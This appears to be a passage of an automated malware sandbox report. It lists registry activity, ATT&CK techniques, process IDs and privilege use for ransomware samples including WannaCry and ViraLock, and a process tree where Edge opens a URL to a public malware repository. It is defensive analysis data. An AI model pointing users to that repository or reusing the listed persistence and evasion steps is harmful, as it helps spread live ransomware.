Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WannaCry.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	QeIwwoYc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ViraLock.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ViraLock.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ViraLock.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1472	PING.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Kills process with taskkill 4 IoCs

evasion

pid	Process
2112	taskkill.exe
2424	taskkill.exe
5020	taskkill.exe
4640	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 44 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\pornhub.com\Total = "14"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\www.pornhub.com\ = "0"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3085458633"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31123232"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\GPU	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\www.pornhub.com\ = "14"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3083270564"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31123232"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\Total\ = "14"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.pornhub.com	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\DOMStorage\pornhub.com	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{E36B350E-5313-11EF-BB4F-762C928CCA03} = "0"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\""	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = b06e41ac20e7da01	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31123232"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\pornhub.com\NumberOfSubdomains = "1"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000001bc9387f4f791b45af7c7e57591307f100000000020000000000106600000001000020000000c797ee467f27ac249d961a8a8915b70f7fad85e30c202c023357c32667551dbc000000000e80000000020000200000009d8418087241b9ce73c8ffa60f7eaca208f819b34242e186e245d1c46e5dc47020000000307259644c5314183ba1e3f1eca76a1444fd226e9e03e12c98dc6bf20edd68e240000000d90e544f734044afa1f9e01032707863b510ca423e6deafb67fc0ef6da11ba11ddaec93f7b10fdcafcb7ae8e0ab8f3408b249b2235399502088fea135c8e67b4	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3083270564"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\IESettingSync	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\pornhub.com	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\Total\ = "0"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\pornhub.com\Total = "0"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	IEXPLORE.EXE

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1302416131-1437503476-2806442725-1000\{93A72D8F-199F-4329-B468-6FEA58994409}	IEXPLORE.EXE

Modifies registry key 1 TTPs 64 IoCs

Modify Registry

T1112

pid	Process
4372	reg.exe
1196	reg.exe
5228	reg.exe
5904	reg.exe
2268	reg.exe
3472	reg.exe
2100	reg.exe
3048	reg.exe
6136	reg.exe
1224	reg.exe
972	reg.exe
4768	reg.exe
5776	reg.exe
4572	reg.exe
2080	reg.exe
5692	reg.exe
968	reg.exe
1128	reg.exe
5708	reg.exe
6100	reg.exe
4280	reg.exe
5748	reg.exe
5368	reg.exe
3548	reg.exe
3500	reg.exe
1012	reg.exe
2572	reg.exe
2760	reg.exe
64	reg.exe
4292	reg.exe
4996	reg.exe
5556	reg.exe
2956	reg.exe
3048	reg.exe
2704	reg.exe
6036	reg.exe
5148	reg.exe
4764	reg.exe
4556	reg.exe
5956	reg.exe
2288	reg.exe
4392	reg.exe
5768	reg.exe
5128	reg.exe
5520	reg.exe
1424	reg.exe
1692	reg.exe
5108	reg.exe
4756	reg.exe
2692	reg.exe
4448	reg.exe
3900	reg.exe
5360	reg.exe
1668	reg.exe
4144	reg.exe
2668	reg.exe
3500	reg.exe
5976	reg.exe
968	reg.exe
4448	reg.exe
6020	reg.exe
5996	reg.exe
2760	reg.exe
2760	reg.exe

NTFS ADS 6 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 76378.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 466967.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 271447.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 468557.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 912608.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 703404.crdownload:SmartScreen	msedge.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1472	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1912	schtasks.exe
4828	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4264	msedge.exe
4264	msedge.exe
4052	msedge.exe
4052	msedge.exe
4920	identity_helper.exe
4920	identity_helper.exe
772	msedge.exe
772	msedge.exe
5064	msedge.exe
5064	msedge.exe
5068	msedge.exe
5068	msedge.exe
3432	rundll32.exe
3432	rundll32.exe
3432	rundll32.exe
3432	rundll32.exe
2352	4973.tmp
2352	4973.tmp
2352	4973.tmp
2352	4973.tmp
2352	4973.tmp
2352	4973.tmp
2352	4973.tmp
1648	rundll32.exe
1648	rundll32.exe
4824	rundll32.exe
4824	rundll32.exe
2312	msedge.exe
2312	msedge.exe
2312	msedge.exe
2312	msedge.exe
4392	rundll32.exe
4392	rundll32.exe
1948	rundll32.exe
1948	rundll32.exe
4284	rundll32.exe
4284	rundll32.exe
376	rundll32.exe
376	rundll32.exe
4332	rundll32.exe
4332	rundll32.exe
4756	rundll32.exe
4756	rundll32.exe
4764	rundll32.exe
4764	rundll32.exe
1948	rundll32.exe
1948	rundll32.exe
4812	rundll32.exe
4812	rundll32.exe
4568	rundll32.exe
4568	rundll32.exe
1288	rundll32.exe
1288	rundll32.exe
3260	rundll32.exe
3260	rundll32.exe
3876	rundll32.exe
3876	rundll32.exe
4568	rundll32.exe
4568	rundll32.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4868	msedge.exe

Suspicious behavior: GetForegroundWindowSpam 3 IoCs

pid	Process
4296	iexplore.exe
4052	msedge.exe
1576	liAkMUUQ.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 15 IoCs

pid	Process
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3432	rundll32.exe
Token: SeDebugPrivilege	3432	rundll32.exe
Token: SeTcbPrivilege	3432	rundll32.exe
Token: SeDebugPrivilege	2352	4973.tmp
Token: SeShutdownPrivilege	1648	rundll32.exe
Token: SeDebugPrivilege	1648	rundll32.exe
Token: SeTcbPrivilege	1648	rundll32.exe
Token: SeShutdownPrivilege	4824	rundll32.exe
Token: SeDebugPrivilege	4824	rundll32.exe
Token: SeTcbPrivilege	4824	rundll32.exe
Token: SeShutdownPrivilege	4392	rundll32.exe
Token: SeDebugPrivilege	4392	rundll32.exe
Token: SeTcbPrivilege	4392	rundll32.exe
Token: SeShutdownPrivilege	1948	rundll32.exe
Token: SeDebugPrivilege	1948	rundll32.exe
Token: SeTcbPrivilege	1948	rundll32.exe
Token: SeShutdownPrivilege	4284	rundll32.exe
Token: SeDebugPrivilege	4284	rundll32.exe
Token: SeTcbPrivilege	4284	rundll32.exe
Token: SeShutdownPrivilege	376	rundll32.exe
Token: SeDebugPrivilege	376	rundll32.exe
Token: SeTcbPrivilege	376	rundll32.exe
Token: SeShutdownPrivilege	4332	rundll32.exe
Token: SeDebugPrivilege	4332	rundll32.exe
Token: SeTcbPrivilege	4332	rundll32.exe
Token: SeShutdownPrivilege	4756	rundll32.exe
Token: SeDebugPrivilege	4756	rundll32.exe
Token: SeTcbPrivilege	4756	rundll32.exe
Token: SeShutdownPrivilege	4764	rundll32.exe
Token: SeDebugPrivilege	4764	rundll32.exe
Token: SeTcbPrivilege	4764	rundll32.exe
Token: SeShutdownPrivilege	1948	rundll32.exe
Token: SeDebugPrivilege	1948	rundll32.exe
Token: SeTcbPrivilege	1948	rundll32.exe
Token: SeShutdownPrivilege	4812	rundll32.exe
Token: SeDebugPrivilege	4812	rundll32.exe
Token: SeTcbPrivilege	4812	rundll32.exe
Token: SeShutdownPrivilege	4568	rundll32.exe
Token: SeDebugPrivilege	4568	rundll32.exe
Token: SeTcbPrivilege	4568	rundll32.exe
Token: SeShutdownPrivilege	1288	rundll32.exe
Token: SeDebugPrivilege	1288	rundll32.exe
Token: SeTcbPrivilege	1288	rundll32.exe
Token: SeShutdownPrivilege	3260	rundll32.exe
Token: SeDebugPrivilege	3260	rundll32.exe
Token: SeTcbPrivilege	3260	rundll32.exe
Token: SeShutdownPrivilege	3876	rundll32.exe
Token: SeDebugPrivilege	3876	rundll32.exe
Token: SeTcbPrivilege	3876	rundll32.exe
Token: SeShutdownPrivilege	4568	rundll32.exe
Token: SeDebugPrivilege	4568	rundll32.exe
Token: SeTcbPrivilege	4568	rundll32.exe
Token: SeDebugPrivilege	2112	taskkill.exe
Token: SeDebugPrivilege	4640	taskkill.exe
Token: SeDebugPrivilege	5020	taskkill.exe
Token: SeDebugPrivilege	2424	taskkill.exe
Token: SeIncreaseQuotaPrivilege	3416	WMIC.exe
Token: SeSecurityPrivilege	3416	WMIC.exe
Token: SeTakeOwnershipPrivilege	3416	WMIC.exe
Token: SeLoadDriverPrivilege	3416	WMIC.exe
Token: SeSystemProfilePrivilege	3416	WMIC.exe
Token: SeSystemtimePrivilege	3416	WMIC.exe
Token: SeProfSingleProcessPrivilege	3416	WMIC.exe
Token: SeIncBasePriorityPrivilege	3416	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe

Suspicious use of SetWindowsHookEx 16 IoCs

pid	Process
4296	iexplore.exe
4900	!WannaDecryptor!.exe
4900	!WannaDecryptor!.exe
3852	!WannaDecryptor!.exe
3852	!WannaDecryptor!.exe
1532	!WannaDecryptor!.exe
1532	!WannaDecryptor!.exe
2852	!WannaDecryptor!.exe
2852	!WannaDecryptor!.exe
5712	IEXPLORE.EXE
5712	IEXPLORE.EXE
1052	IEXPLORE.EXE
1052	IEXPLORE.EXE
5712	IEXPLORE.EXE
1052	IEXPLORE.EXE
1052	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4052 wrote to memory of 1260	4052	msedge.exe	84
PID 4052 wrote to memory of 1260	4052	msedge.exe	84
PID 4052 wrote to memory of 3224	4052	msedge.exe	85
PID 4052 wrote to memory of 3224	4052	msedge.exe	85
PID 4052 wrote to memory of 3224	4052	msedge.exe	85
PID 4052 wrote to memory of 3224	4052	msedge.exe	85
PID 4052 wrote to memory of 3224	4052	msedge.exe	85
PID 4052 wrote to memory of 3224	4052	msedge.exe	85
PID 4052 wrote to memory of 3224	4052	msedge.exe	85
PID 4052 wrote to memory of 3224	4052	msedge.exe	85
PID 4052 wrote to memory of 3224	4052	msedge.exe	85
PID 4052 wrote to memory of 3224	4052	msedge.exe	85
PID 4052 wrote to memory of 3224	4052	msedge.exe	85
PID 4052 wrote to memory of 3224	4052	msedge.exe	85
PID 4052 wrote to memory of 3224	4052	msedge.exe	85
PID 4052 wrote to memory of 3224	4052	msedge.exe	85
PID 4052 wrote to memory of 3224	4052	msedge.exe	85
PID 4052 wrote to memory of 3224	4052	msedge.exe	85
PID 4052 wrote to memory of 3224	4052	msedge.exe	85
PID 4052 wrote to memory of 3224	4052	msedge.exe	85
PID 4052 wrote to memory of 3224	4052	msedge.exe	85
PID 4052 wrote to memory of 3224	4052	msedge.exe	85
PID 4052 wrote to memory of 3224	4052	msedge.exe	85
PID 4052 wrote to memory of 3224	4052	msedge.exe	85
PID 4052 wrote to memory of 3224	4052	msedge.exe	85
PID 4052 wrote to memory of 3224	4052	msedge.exe	85
PID 4052 wrote to memory of 3224	4052	msedge.exe	85
PID 4052 wrote to memory of 3224	4052	msedge.exe	85
PID 4052 wrote to memory of 3224	4052	msedge.exe	85
PID 4052 wrote to memory of 3224	4052	msedge.exe	85
PID 4052 wrote to memory of 3224	4052	msedge.exe	85
PID 4052 wrote to memory of 3224	4052	msedge.exe	85
PID 4052 wrote to memory of 3224	4052	msedge.exe	85
PID 4052 wrote to memory of 3224	4052	msedge.exe	85
PID 4052 wrote to memory of 3224	4052	msedge.exe	85
PID 4052 wrote to memory of 3224	4052	msedge.exe	85
PID 4052 wrote to memory of 3224	4052	msedge.exe	85
PID 4052 wrote to memory of 3224	4052	msedge.exe	85
PID 4052 wrote to memory of 3224	4052	msedge.exe	85
PID 4052 wrote to memory of 3224	4052	msedge.exe	85
PID 4052 wrote to memory of 3224	4052	msedge.exe	85
PID 4052 wrote to memory of 3224	4052	msedge.exe	85
PID 4052 wrote to memory of 4264	4052	msedge.exe	86
PID 4052 wrote to memory of 4264	4052	msedge.exe	86
PID 4052 wrote to memory of 964	4052	msedge.exe	87
PID 4052 wrote to memory of 964	4052	msedge.exe	87
PID 4052 wrote to memory of 964	4052	msedge.exe	87
PID 4052 wrote to memory of 964	4052	msedge.exe	87
PID 4052 wrote to memory of 964	4052	msedge.exe	87
PID 4052 wrote to memory of 964	4052	msedge.exe	87
PID 4052 wrote to memory of 964	4052	msedge.exe	87
PID 4052 wrote to memory of 964	4052	msedge.exe	87
PID 4052 wrote to memory of 964	4052	msedge.exe	87
PID 4052 wrote to memory of 964	4052	msedge.exe	87
PID 4052 wrote to memory of 964	4052	msedge.exe	87
PID 4052 wrote to memory of 964	4052	msedge.exe	87
PID 4052 wrote to memory of 964	4052	msedge.exe	87
PID 4052 wrote to memory of 964	4052	msedge.exe	87
PID 4052 wrote to memory of 964	4052	msedge.exe	87
PID 4052 wrote to memory of 964	4052	msedge.exe	87
PID 4052 wrote to memory of 964	4052	msedge.exe	87
PID 4052 wrote to memory of 964	4052	msedge.exe	87
PID 4052 wrote to memory of 964	4052	msedge.exe	87
PID 4052 wrote to memory of 964	4052	msedge.exe	87

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/Da2dalus/The-MALWARE-Repo
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4052
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffead0b46f8,0x7ffead0b4708,0x7ffead0b4718
  2⤵
  PID:1260
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
